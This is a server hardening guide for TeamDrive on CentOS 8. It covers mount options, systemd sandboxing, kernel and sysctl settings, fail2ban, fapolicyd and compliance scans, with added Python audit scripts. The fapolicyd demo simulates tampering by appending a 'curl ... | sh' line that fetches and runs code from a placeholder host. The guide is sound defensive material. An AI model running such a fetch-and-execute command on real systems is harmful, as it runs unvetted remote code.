TeamDrive Server Hardening¶
The server hardening is based on the CIS Benchmark for CentOS 8 version 2.0.0, which can be downloaded from the Center for Internet Security:
https://www.cisecurity.org/cis-benchmarks/
CentOS 8 Partition Layout¶
Partition Layout:
- root            42.0 GB
  |               11.0 GB
  |- dev           1.9 GB (tmpfs,noexec,nosuid,nodev)
  |  |- shm        2.0 GB (tmpfs,noexec,nosuid,nodev)
  |- run           2.0 GB (noexec,nosuid,nodev)
  |- sys
  |  |- fs
  |     |- cgroup  2.0 GB (tmpfs)
  |- usr           4.7 GB (nodev)
  |- boot          471 MB (noexec,nosuid,nodev)
  |- opt           950 MB (nosuid,nodev)
  |- proc                 (noexec,nosuid,nodev,hidepid=2*)
  |- home          471 MB (noexec,nosuid,nodev)
  |- tmp           950 MB (tmpfs,noexec,nosuid,nodev)
  |- var                  (noexec,nosuid,nodev)
  |  |- www        471 MB (noexec,nosuid,nodev)
  |  |- ossec      950 MB (nosuid,nodev)
  |  |- spool      471 MB (noexec,nosuid,nodev)
  |  |- tmp        950 MB (noexec,nosuid,nodev)
  |  |- log        4.7 GB (noexec,nosuid,nodev)
  |     |- audit   9.4 GB (noexec,nosuid,nodev)
  |- run                  (tmpfs,noexec,nosuid,nodev)
  |  |- user
  |     |- 0       393 MB (tmpfs)
  |- swap                 (encrypted)
(*) hidepid=2: processes owned by other users are completely hidden from an unprivileged user (their /proc/<pid> directories are invisible); root still sees all processes
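A way to verify that the layout above is actually in effect on a running system, as an added example (not part of the TeamDrive distribution): the script below parses text in /proc/mounts format and reports every mount point from the layout that is either not a separate file system or lacks the promised options. The sample input is constructed; the baseline table is transcribed from the layout above.

```python
"""Mount-option audit for the partition layout above.

Added example, not part of the TeamDrive distribution: it reads text in the
format of /proc/mounts and reports mount points that are either not separate
file systems or lack the options the layout promises.
"""
import sys

# Required options per mount point, transcribed from the layout above.
# (Kernels >= 5.8 report hidepid=2 as "hidepid=invisible"; both are accepted.)
BASELINE = {
    "/dev/shm": {"noexec", "nosuid", "nodev"},
    "/boot": {"noexec", "nosuid", "nodev"},
    "/opt": {"nosuid", "nodev"},
    "/proc": {"noexec", "nosuid", "nodev", "hidepid=2"},
    "/home": {"noexec", "nosuid", "nodev"},
    "/tmp": {"noexec", "nosuid", "nodev"},
    "/var": {"noexec", "nosuid", "nodev"},
    "/var/tmp": {"noexec", "nosuid", "nodev"},
    "/var/log": {"noexec", "nosuid", "nodev"},
    "/var/log/audit": {"noexec", "nosuid", "nodev"},
}


def parse_mounts(text):
    """Return {mount point: set of options} from /proc/mounts-style lines.

    Fields: source target fstype options dump pass.  Paths escape spaces as
    \\040.  A later line for the same target shadows an earlier one, which is
    also what the kernel does with over-mounts.
    """
    mounts = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        target = fields[1].replace("\\040", " ")
        options = set(fields[3].split(","))
        if "hidepid=invisible" in options:
            options.add("hidepid=2")
        mounts[target] = options
    return mounts


def audit_mounts(text, baseline=BASELINE):
    """Return a list of (mount point, problem) findings; empty means compliant."""
    mounts = parse_mounts(text)
    findings = []
    for target, required in baseline.items():
        options = mounts.get(target)
        if options is None:
            findings.append((target, "not a separate mount"))
            continue
        missing = sorted(required - options)
        if missing:
            findings.append((target, "missing " + ",".join(missing)))
    return findings


# Constructed sample: /home lacks noexec and /opt lives on the root file system.
SAMPLE_MOUNTS = """\
/dev/mapper/cl-root / xfs rw,relatime,attr2,inode64,noquota 0 0
devtmpfs /dev devtmpfs rw,nosuid,noexec,nodev,size=1900000k 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime,hidepid=2 0 0
/dev/mapper/cl-boot /boot xfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/mapper/cl-home /home xfs rw,nosuid,nodev,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
/dev/mapper/cl-var /var xfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/mapper/cl-vtmp /var/tmp xfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/mapper/cl-log /var/log xfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/mapper/cl-audit /var/log/audit xfs rw,nosuid,nodev,noexec,relatime 0 0
"""

if __name__ == "__main__":
    # Audit the running system with --live, the constructed sample otherwise.
    text = open("/proc/mounts").read() if "--live" in sys.argv else SAMPLE_MOUNTS
    for target, problem in audit_mounts(text):
        print(f"{target}: {problem}")
```

Run it with `--live` on the server after every fstab change; a mount that is listed in /etc/fstab but shown as "not a separate mount" usually means the unit failed at boot and the directory is silently sitting on the root file system without noexec.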
Service Isolation and Sandboxing¶
The following services are sandboxed using a systemd drop-in (01-sandboxing.conf) that restricts their access to file systems, networks, devices, kernel capabilities and system calls:
- aide: Advanced Intrusion Detection Environment
- auditd: Linux Auditing System (see /etc/audit/rules.d/ for audit rules)
- chkrootkit: Chkrootkit Security Scanner
- chronyd: Network Time Protocol (see /etc/chrony.conf for list of time servers)
- crond: Cronjob
- dbus: inter-process communication
- dnf-automatic-install: unattended download and installation of updates (see /etc/dnf/automatic.conf)
- dnscrypt-proxy: DNS proxy using encrypted DNS
- dnsmasq: DNS-Server
- fail2ban: scans log files and bans IPs that show signs of malicious behaviour, such as too many password failures or probing for exploits
- firewalld: Firewall
- haveged: random number generator
- httpd: Apache webserver
- irqbalance: Linux daemon that distributes hardware interrupts across the processors and cores of the system
- mysqld: MySQL database server
- NetworkManager: Program for providing detection and configuration for systems to automatically connect to networks
- php-fpm: Execution of PHP scripts
- polkit: application-level toolkit for defining and handling the policy that allows unprivileged processes to speak to privileged processes
- postfix: mail transport agent
- rkhunter: rootkit scanner
- rsyslog: log processing
- s3d: TeamDrive S3-Daemon (only used on the hosting server)
- sshd: SSH daemon
- systemd-logind: System service that manages user logins
- systemd-udevd: kernel events processing
- td-hostserver: TeamDrive Hosting Server background task (only used on the hosting server)
- td-regserver: TeamDrive Registration Server background task (only used on the registration server)
- td-webportal: TeamDrive Webportal Server background task (only used on the webportal server)
- tmp.mount: mounting temporary filesystem
- usbguard: USB device watcher
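To make the sandboxing concrete, an added illustrative drop-in for httpd follows. It is not copied from the TeamDrive package (the real 01-sandboxing.conf may use different directives and paths; the file name, the ReadWritePaths and the capability set are assumptions for a stock CentOS 8 httpd). All directives exist in the systemd 239 shipped with CentOS 8.

```ini
# /etc/systemd/system/httpd.service.d/01-sandboxing.conf  (illustrative)
[Service]
# File system: everything read-only except the paths httpd must write to
ProtectSystem=strict
ProtectHome=true
PrivateTmp=true
ReadWritePaths=/var/www /var/log/httpd /run/httpd
# Devices and kernel interfaces
PrivateDevices=true
ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
# Network: IPv4 and local sockets only (the IPv6 stack is disabled anyway)
RestrictAddressFamilies=AF_INET AF_UNIX
# Capabilities: bind :80/:443 and drop to the apache user, nothing else
CapabilityBoundingSet=CAP_NET_BIND_SERVICE CAP_SETUID CAP_SETGID
NoNewPrivileges=true
# System calls: the generic service set, minus groups a web server never needs
# (@privileged is deliberately not removed: it contains setuid/setgid, which
# httpd needs to drop privileges after binding its ports)
SystemCallFilter=@system-service
SystemCallFilter=~@mount @debug @obsolete @cpu-emulation
SystemCallArchitectures=native
LockPersonality=true
MemoryDenyWriteExecute=true
RestrictRealtime=true
RestrictNamespaces=true
```

After placing a drop-in run `systemctl daemon-reload`, restart the unit and check `journalctl -u httpd` for EPERM/EACCES errors before trusting it; `systemd-analyze security httpd` prints the resulting exposure score. MemoryDenyWriteExecute breaks JIT engines (for example PHP 8 opcache.jit), so it is not a safe default for php-fpm.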
SSH Authentication, Login and Passwords¶
- TLS: Disabled all protocol versions below TLS 1.2 (SSL 3.0, TLS 1.0, TLS 1.1; see /etc/crypto-policies/back-ends/gnutls.config; the back-end files are generated by update-crypto-policies, so persistent changes belong in a policy module, not in the generated file)
- Bootloader: see /etc/default/grub
- SSH banner: see /etc/issue
- SSH login on port 2021 instead of 22: several adjustments in /etc/ssh/sshd_config
- Login parameters in /etc/login.defs: password expiry after 60 days (PASS_MAX_DAYS), login retries set to 5 (LOGIN_RETRIES) with lockouts for failed password attempts, default UMASK set to 022 (/etc/profile, /etc/init.d/functions, /etc/bashrc, /etc/csh.cshrc)
- Password quality and length (minimum 18 characters, set in /etc/security/pwquality.conf), hashing algorithm, reuse prevention
- OpenSSH client and server configured compliant to:
  - DISA STIG for Red Hat Enterprise Linux 8 V1R7
  - CIS Red Hat Enterprise Linux 8 Benchmark for Level 1 - Server
  - CIS Red Hat Enterprise Linux 8 Benchmark for Level 2 - Server
  - PCI-DSS v3.2.1 Control Baseline for Red Hat Enterprise Linux 8
  - Protection Profile for General Purpose Operating Systems (Red Hat Enterprise Linux 8)
  - Australian Cyber Security Centre (ACSC) ISM Official (Red Hat Enterprise Linux 8)
  - Health Insurance Portability and Accountability Act (HIPAA) for Red Hat Enterprise Linux 8
Kernel adjustments¶
- Kernel self-protection and exploit mitigation via boot parameters: l1tf=full,force mds=full,nosmt nosmt=force spectre_v2=on spectre_v2_user=on spec_store_bypass_disable=on kvm.nx_huge_pages=force tsx=off tsx_async_abort=full,nosmt
- Restricting access to kernel pointers in the proc filesystem by hiding kernel symbol addresses regardless of privileges
- Disabled ptrace entirely, core dumps (see /etc/sysctl.d/50-coredump.conf, /etc/systemd/coredump.conf) and debugging functionality including debugfs (setting debugfs=off)
- Disabled kexec and kernel module loading
- ASLR with high entropy
- Protected symlinks, hardlinks, FIFOs and regular files to mitigate TOCTOU (time-of-check to time-of-use) race conditions and data spoofing attacks
- Mitigate use-after-free attacks through sanity checks and red zoning of SLUB/SLAB objects (setting slub_debug=FZ; object poisoning additionally requires the P flag, i.e. slub_debug=FZP)
- Randomize the kernel stack offset on syscall entry (setting randomize_kstack_offset=on)
- Disabled slab merging (setting slab_nomerge), which significantly increases the difficulty of heap exploitation by preventing objects from merged caches from being overwritten and by making it harder to influence the slab cache layout
- Mitigate use-after-free vulnerabilities and erase sensitive information in memory by zeroing memory at allocation and free time (settings init_on_alloc=1, init_on_free=1)
- Randomization of page allocator freelists (setting page_alloc.shuffle=1)
- Kernel Page Table Isolation (setting pti=on) to mitigate Meltdown and prevent KASLR bypasses
- Disabled vsyscalls (setting vsyscall=none) to protect against ROP attacks
- Kernel panic on oops (setting oops=panic) to prevent continued operation with compromised reliability
- CPU vulnerability mitigations
- Fully enabled hardening of JIT-compiled BPF to mitigate some types of JIT spraying attacks
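Boot parameters are easy to lose (a regenerated grub.cfg, a kernel update with a different default), so an added example follows that is not part of the TeamDrive distribution: it parses /proc/cmdline and compares it with the parameters listed above. The expected table is transcribed from the list; the sample command line is constructed.

```python
"""Kernel command-line audit for the boot parameters listed above.

Added example, not part of the TeamDrive distribution.  It parses the text of
/proc/cmdline and compares it with the parameters the list above names.
"""
import glob
import shlex
import sys

# Expected boot parameters, transcribed from the list above.  None means the
# parameter is a bare flag without a value.
EXPECTED_CMDLINE = {
    "l1tf": "full,force",
    "mds": "full,nosmt",
    "nosmt": "force",
    "spectre_v2": "on",
    "spectre_v2_user": "on",
    "spec_store_bypass_disable": "on",
    "kvm.nx_huge_pages": "force",
    "tsx": "off",
    "tsx_async_abort": "full,nosmt",
    "slub_debug": "FZ",
    "init_on_alloc": "1",
    "init_on_free": "1",
    "randomize_kstack_offset": "on",
    "page_alloc.shuffle": "1",
    "slab_nomerge": None,
    "pti": "on",
    "vsyscall": "none",
    "debugfs": "off",
    "oops": "panic",
}


def parse_cmdline(text):
    """Return {parameter: value} for a kernel command line.

    shlex handles the double-quoted values GRUB may pass (l1tf="full,force");
    a parameter given twice keeps its last value, as the kernel's parser does.
    """
    params = {}
    for token in shlex.split(text):
        key, sep, value = token.partition("=")
        params[key] = value if sep else None
    return params


def audit_cmdline(text, expected=EXPECTED_CMDLINE):
    """Return (parameter, problem) findings; empty means every parameter is set."""
    params = parse_cmdline(text)
    findings = []
    for key, want in expected.items():
        if key not in params:
            findings.append((key, "absent"))
        elif want is not None and params[key] != want:
            findings.append((key, f"is {params[key]}, expected {want}"))
    return findings


def vulnerability_status():
    """Effective mitigation state per CPU bug, from sysfs (live systems only).

    The command line only requests a mitigation; sysfs reports what the kernel
    actually applied, e.g. 'Vulnerable' when the CPU lacks the feature.
    """
    status = {}
    for path in sorted(glob.glob("/sys/devices/system/cpu/vulnerabilities/*")):
        with open(path) as f:
            status[path.rsplit("/", 1)[1]] = f.read().strip()
    return status


# Constructed sample: everything present except a stack offset left at "off",
# plus one quoted value to exercise the parser.
SAMPLE_CMDLINE = (
    "BOOT_IMAGE=(hd0,msdos1)/vmlinuz-4.18.0-x86_64 root=/dev/mapper/cl-root ro "
    'l1tf="full,force" mds=full,nosmt nosmt=force spectre_v2=on spectre_v2_user=on '
    "spec_store_bypass_disable=on kvm.nx_huge_pages=force tsx=off "
    "tsx_async_abort=full,nosmt slub_debug=FZ init_on_alloc=1 init_on_free=1 "
    "randomize_kstack_offset=off page_alloc.shuffle=1 slab_nomerge pti=on "
    "vsyscall=none debugfs=off oops=panic"
)

if __name__ == "__main__":
    text = open("/proc/cmdline").read() if "--live" in sys.argv else SAMPLE_CMDLINE
    for key, problem in audit_cmdline(text):
        print(f"{key}: {problem}")
    if "--live" in sys.argv:
        for bug, state in vulnerability_status().items():
            print(f"{bug}: {state}")
```

Run with `--live` after every kernel or GRUB update; a parameter the running kernel does not know is silently ignored, so the sysfs status is the authoritative answer on whether a mitigation is actually active.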
Filesystem¶
- Adjusted mount options in /etc/fstab
- Encrypted swap device
- Disabled uncommon filesystems
Network¶
- Entire IPv6 stack disabled
- IPv4 stack hardening:
- Protection against SYN flood attacks
- Protection against time-wait assassination by dropping RST packets for sockets in the time-wait state
- Protection against IP spoofing through strict mode reverse path filtering
- Protection against Smurf attacks
- Prevent clock fingerprinting through ICMP timestamps
- Prevent man-in-the-middle attacks and minimise information disclosure by disabling ICMP redirect acceptance, sending and echo, and by disabling source routing
- Disabled TCP selective acknowledgement (SACK) to remove its attack surface (note: this reduces throughput on lossy links)
- Logging of martian packets
- TCP ISN CPU Information Leak Protection by using the tirdad kernel module
- Disabled uncommon network protocols and (obsolete) services and wireless networking
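Most of the items in the Kernel adjustments and Network sections above are sysctl settings, and a value in /etc/sysctl.d is only a request: a later file, a missing module or a disabled stack can leave the live value different. The added example below (not part of the TeamDrive distribution) parses `sysctl -a` output and reports deviations. The page names the hardening items, not the keys; the sysctl names used here are the standard Linux ones for each item and are this example's assumption about how they are set. The sample output is constructed.

```python
"""sysctl audit for the kernel and IPv4 hardening items in the Kernel
adjustments and Network sections above.

Added example, not part of the TeamDrive distribution.  It parses `sysctl -a`
output (key = value lines) and reports deviations.  The sysctl names are the
standard Linux ones for each item and are an assumption of this example.
"""
import subprocess
import sys

EXPECTED_SYSCTL = {
    # Kernel adjustments
    "kernel.kptr_restrict": "2",           # hide kernel pointers even from root
    "kernel.yama.ptrace_scope": "3",       # ptrace disabled entirely
    "kernel.kexec_load_disabled": "1",
    "kernel.modules_disabled": "1",        # one-way switch until reboot
    "kernel.randomize_va_space": "2",      # full ASLR
    "fs.suid_dumpable": "0",
    "fs.protected_symlinks": "1",
    "fs.protected_hardlinks": "1",
    "fs.protected_fifos": "2",
    "fs.protected_regular": "2",
    "net.core.bpf_jit_harden": "2",        # harden the BPF JIT for all users
    # Network
    "net.ipv6.conf.all.disable_ipv6": "1",
    "net.ipv4.tcp_syncookies": "1",        # SYN flood
    "net.ipv4.tcp_rfc1337": "1",           # time-wait assassination
    "net.ipv4.conf.all.rp_filter": "1",    # strict reverse path filtering
    "net.ipv4.conf.default.rp_filter": "1",
    "net.ipv4.icmp_echo_ignore_broadcasts": "1",  # Smurf
    "net.ipv4.conf.all.accept_redirects": "0",
    "net.ipv4.conf.all.send_redirects": "0",
    "net.ipv4.conf.all.accept_source_route": "0",
    "net.ipv4.tcp_sack": "0",
    "net.ipv4.conf.all.log_martians": "1",
}


def parse_sysctl(text):
    """Return {key: value} from `sysctl -a` output.

    Lines without '=' are skipped; multi-value settings separated by tabs
    (e.g. ip_local_port_range) are normalised to single spaces.
    """
    settings = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        settings[key.strip()] = " ".join(value.split())
    return settings


def audit_sysctl(text, expected=EXPECTED_SYSCTL):
    """Return (key, actual, expected) for every deviation.

    actual is None when the key does not exist at all, which happens when the
    IPv6 stack is compiled out or a module (e.g. yama) is not loaded.
    """
    settings = parse_sysctl(text)
    return [(key, settings.get(key), want)
            for key, want in expected.items() if settings.get(key) != want]


# Constructed sample: default.rp_filter is missing and SACK was re-enabled.
SAMPLE_SYSCTL = """\
kernel.kptr_restrict = 2
kernel.yama.ptrace_scope = 3
kernel.kexec_load_disabled = 1
kernel.modules_disabled = 1
kernel.randomize_va_space = 2
fs.suid_dumpable = 0
fs.protected_symlinks = 1
fs.protected_hardlinks = 1
fs.protected_fifos = 2
fs.protected_regular = 2
net.core.bpf_jit_harden = 2
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_rfc1337 = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.tcp_sack = 1
net.ipv4.conf.all.log_martians = 1
net.ipv4.ip_local_port_range = 32768\t60999
"""

if __name__ == "__main__":
    if "--live" in sys.argv:
        text = subprocess.run(["sysctl", "-a"], capture_output=True, text=True).stdout
    else:
        text = SAMPLE_SYSCTL
    for key, actual, want in audit_sysctl(text):
        print(f"{key}: {actual!r} (expected {want!r})")
```

Note that kernel.modules_disabled=1 cannot be undone without a reboot, and kernel.yama.ptrace_scope=3 also blocks debuggers for root; both are intended here but worth knowing before troubleshooting on the box.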
Firewall¶
- Using systemd sandboxed firewalld with nftables backend and “drop” as default zone
- Incoming traffic allowed for: 2021 (SSH), 80 (HTTP) 443 (HTTPS)
Shell¶
- Uninstalled unused shells (tcsh, csh, ash, ksh, zsh, es, rc, esh, dash) and screen
- Login sessions start in tmux with auto-logoff (see /etc/tmux.conf, /etc/profile.d/timeout.sh); tmux hint: to copy and paste with the mouse, hold the Shift key
Disabled services¶
Ensured that unused services are disabled:
- autofs
- avahi-daemon
- bind9
- bluetooth
- chargen-dgram
- chargen-stream
- chrony-wait
- cups
- cups-browsed
- daytime-dgram
- daytime-stream
- dhcpd
- discard-dgram
- discard-stream
- dovecot
- echo-dgram
- echo-stream
- hidd
- irqbalance
- isc-dhcp-server
- isc-dhcp-server6
- kdump
- lpd.service
- named
- nfs
- nfs-server
- nfslock
- nginx
- nis
- nmb
- ntalk
- ntpd
- ntpdate
- portmap
- proftp
- pure-ftpd
- rexec.socket.service
- rhnsd
- rlogin.socket.service
- rngd
- rpcbind.service
- rpcbind.socket
- rpcgssd
- rpcidmapd
- rpcsvcgssd
- rsh.socket.service
- rsyncd
- samba-ad-dc
- sendmail
- slapd
- smb
- snmpd
- sntp
- squid
- systemd-timesyncd
- tcpmux-server
- telnet.socket.service
- tftp.socket
- time-dgram
- time-stream
- vsftpd
- xinetd
- ypserv
- systemd-coredump.service
- plymouth-halt.service
- plymouth-poweroff.service
- plymouth-quit-wait.service
- plymouth-reboot.service
- plymouth-switch-root.service
- plymouth-kexec.service
- plymouth-quit.service
- plymouth-read-write.service
- plymouth-start.service
Package Management and Automatic (Security) Updates¶
- Enabled gpg check for all repositories and for local packages
- Using dnf-automatic and needrestart for update notification/installation and restart of services, see /etc/dnf/automatic.conf
Virus check¶
ClamAV for Linux (see https://www.clamav.net) is installed on the server. The ClamAV service needs 1 GB RAM and will use 1 full CPU core during the scan process. See /etc/clamd.d/scan.conf for scan configuration and parameters.
Signature databases from ClamAV and additional 3rd party signature databases via clamav-unofficial-sigs https://github.com/extremeshok/clamav-unofficial-sigs
Rootkit Scanner¶
Two rootkit scanners are installed, both with a daily scan interval: chkrootkit, and rkhunter including the forensic unhide tool to detect hidden processes and TCP/UDP ports.
RNG and Entropy¶
- RDRAND distrusted by the kernel as an entropy source
- Using systemd sandboxed haveged (HAVEGE algorithm) as random number generator daemon for high entropy https://github.com/jirka-h/haveged
Fail2Ban¶
Fail2ban (see https://www.fail2ban.org) scans log files (e.g. /var/log/apache/error_log) and bans IPs that show signs of malicious behaviour, such as too many password failures or probing for exploits. Fail2ban is generally used to update firewall rules to reject those IP addresses for a specified amount of time, although any other action (e.g. sending an email) can also be configured. Out of the box it comes with filters for various services (apache, courier, ssh, etc.).
Whitelist your own IPs in /etc/fail2ban/jail.local (ignoreip); otherwise a few mistyped passwords lock you out of your own server.
Fail2ban is activated for Apache, PHP, postfix and SSH with these jails: apache-auth, apache-badbots, apache-noscript, apache-overflows, apache-shellshock, php-url-fopen
To check currently banned IPs:
fail2ban-client banned
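An added illustrative jail.local, not the file shipped with TeamDrive (the addresses are placeholders from the documentation ranges, and the ban times and action names are assumptions; check the shipped file before copying anything). It shows the whitelist and the one detail that matters on this system: sshd listens on 2021, so the sshd jail must be told the port, otherwise the ban rule is written for port 22 and has no effect.

```ini
# /etc/fail2ban/jail.local  (illustrative)
[DEFAULT]
# Never ban these: loopback plus your own management addresses/networks
# (203.0.113.10 and 198.51.100.0/24 are placeholders).
ignoreip = 127.0.0.1/8 203.0.113.10 198.51.100.0/24
bantime  = 1h
findtime = 10m
maxretry = 5
# Ban through firewalld (nftables backend), matching the firewall above
banaction = firewallcmd-rich-rules
banaction_allports = firewallcmd-allports

[sshd]
enabled = true
# sshd listens on 2021 on this system.  Left at the default (port = ssh) the
# jail would block port 22, and a banned attacker could keep trying on 2021.
port    = 2021
logpath = %(sshd_log)s

[apache-auth]
enabled = true
logpath = %(apache_error_log)s
```

After editing, `fail2ban-client reload` and then `fail2ban-client status sshd` shows the jail's filter hits and current bans; `fail2ban-client get sshd ignoreip` confirms the whitelist actually applied.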
fapolicyd¶
Setting and enforcing a policy that allows or denies application execution based on a rule set efficiently prevents the execution of unknown and potentially malicious software.
Software installed using dnf is whitelisted automatically (the RPM database is a trust source).
If you install your own scripts, you have to whitelist them explicitly, see:
https://access.redhat.com/documentation/de-de/red_hat_enterprise_linux/8/html/security_hardening/assembly_blocking-and-allowing-applications-using-fapolicyd_security-hardening#marking-files-as-trusted-using-an-additional-source-of-trust_assembly_blocking-and-allowing-applications-using-fapolicyd
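What "whitelisting" a script means in practice is a line in a trust file under /etc/fapolicyd/trust.d/, and the added example below (not part of the TeamDrive distribution or of fapolicyd) generates and verifies such lines in the format fapolicyd.trust(5) documents: `<path> <size> <sha256>`. The sample script it trusts is constructed in a temporary directory. The point it demonstrates: the entry binds the file's size and hash, so editing a trusted script silently un-trusts it until the entry is regenerated.

```python
"""Generate and verify fapolicyd trust-file entries.

Added example, not part of the TeamDrive distribution or of fapolicyd itself.
It reproduces the line format of /etc/fapolicyd/trust.d/*.trust documented in
fapolicyd.trust(5), "<path> <size> <sha256>", which is what
`fapolicyd-cli --file add` writes.
"""
import hashlib
import os
import tempfile


def sha256_of(path):
    """Streamed SHA-256 of a file, as fapolicyd computes it."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def trust_entry(path):
    """Return the trust-file line for `path`.

    The format is space separated, so a path containing spaces cannot be
    represented; refuse it rather than write a line fapolicyd would misparse.
    """
    if " " in path:
        raise ValueError("fapolicyd trust entries cannot contain spaces: %r" % path)
    return f"{path} {os.path.getsize(path)} {sha256_of(path)}"


def is_trusted(path, trust_text):
    """True when `trust_text` (contents of a .trust file) has an entry whose
    path, size and hash all match the file on disk right now.

    Caveat: fapolicyd itself compares size/hash only when `integrity` in
    /etc/fapolicyd/fapolicyd.conf is set to size or sha256; with the default
    `none` it matches the path alone and a modified script would still run.
    This function is the strict variant.
    """
    current = trust_entry(path)
    for line in trust_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and line == current:
            return True
    return False


def demo():
    """Constructed sample: trust a script, tamper with it, re-check.

    Returns (entry, trusted_before, trusted_after).
    """
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "backup.sh")
        with open(script, "wb") as f:
            f.write(b"#!/bin/sh\necho hi\n")            # 18 bytes
        entry = trust_entry(script)
        trusted_before = is_trusted(script, "# local scripts\n" + entry + "\n")
        with open(script, "ab") as f:
            f.write(b"curl http://203.0.113.9/x | sh\n")  # tampered afterwards
        trusted_after = is_trusted(script, entry)
        return entry, trusted_before, trusted_after


if __name__ == "__main__":
    entry, before, after = demo()
    print(entry)
    print("trusted before edit:", before, "/ after edit:", after)
    # On the server the equivalent is:
    #   fapolicyd-cli --file add /usr/local/bin/backup.sh --trust-file local
    #   fapolicyd-cli --update
    # and the same two commands again after every edit of the script.
```

After adding or regenerating an entry, `fapolicyd-cli --update` is what makes the daemon reload its trust database; without it the new line sits in the file and the script is still denied.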
Intrusion Detection (IDS/File Integrity)¶
Daily AIDE scan and integrity check (https://aide.github.io/).
fapolicyd (see above) enforces the "restrictive" policy rule set defined in /etc/fapolicyd/rules.d/*, which is one of the most efficient ways to prevent running untrusted and possibly malicious applications on the system.
DNSCrypt¶
DNSCrypt with DNSSEC using systemd sandboxed dnscrypt-proxy and dnsmasq as local DNS caching server.
DNSCrypt is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven’t been tampered with.
Related conf-Files:
- /etc/NetworkManager/NetworkManager.conf --> dns=none
- /etc/resolv.conf --> nameserver 127.0.0.1
- /etc/systemd/resolved.conf --> DNSStubListener=no
- /etc/dnscrypt-proxy/dnscrypt-proxy.toml
dnscrypt-proxy selects its upstream resolver from this list:
https://dnscrypt.info/public-servers
In case you have to use your own DNS server, remove the immutable flag from:
chattr -i /etc/resolv.conf
and change the nameserver in /etc/resolv.conf to your own value.
NTP¶
Secure NTP with NTS (Network Time Security, RFC 8915) via systemd sandboxed chronyd
Accounting and Auditing¶
Using comprehensive auditing rules compliant to:
- DISA STIG for Red Hat Enterprise Linux 8 V1R7
- CIS Red Hat Enterprise Linux 8 Benchmark for Level 2 - Server
- PCI-DSS v3.2.1 Control Baseline for Red Hat Enterprise Linux 8
- Protection Profile for General Purpose Operating Systems (Red Hat Enterprise Linux 8)
- Australian Cyber Security Centre (ACSC) ISM Official (Red Hat Enterprise Linux 8)
- Health Insurance Portability and Accountability Act (HIPAA) for Red Hat Enterprise Linux 8
PHP (only Registration Server)¶
- Using OWASP recommended security configuration
- Using systemd sandboxed FastCGI Process Manager (FPM)
CentOS Hardening Check¶
To check the hardening score, use the Lynis security auditing tool and the OpenSCAP benchmark scans. Start both checks with:
/root/hardening/benchmark.sh
Lynis generates a test result after 5 minutes analyzing the system with a green, yellow and red status and calculates a hardening index which should be 97 of 100.
After the Lynis check, the OpenSCAP scanner will be started directly:
The OpenSCAP scanner runs the following 8 compliance profiles (CIS, PCI-DSS, ANSSI, HIPAA, ACSC, OSPP and DISA STIG), which take about 25 minutes in total (an overview and further descriptions of the profiles can be found at https://www.mankier.com/8/scap-security-guide):
- CIS Red Hat Enterprise Linux 8 Benchmark for Level 1 - Server
- CIS Red Hat Enterprise Linux 8 Benchmark for Level 2 - Server
- PCI-DSS v3.2.1 Control Baseline for Red Hat Enterprise Linux 8
- ANSSI-BP-028 (enhanced)
- Health Insurance Portability and Accountability Act (HIPAA)
- Australian Cyber Security Centre (ACSC) ISM Official
- Protection Profile for General Purpose Operating Systems
- DISA STIG for Red Hat Enterprise Linux 8
Each check will generate a html result file located in:
/root/hardening/
Known problems caused by the hardening¶
A dnf update might fail when the "setup" package is updated, because /etc/shells is protected with the immutable attribute. To fix the problem:
chattr -i /etc/shells
dnf update
chattr +i /etc/shells
If dnf update fails with “glibc-devel-2.28-225.el8.i686 has inferior architecture” use:
dnf update --allowerasing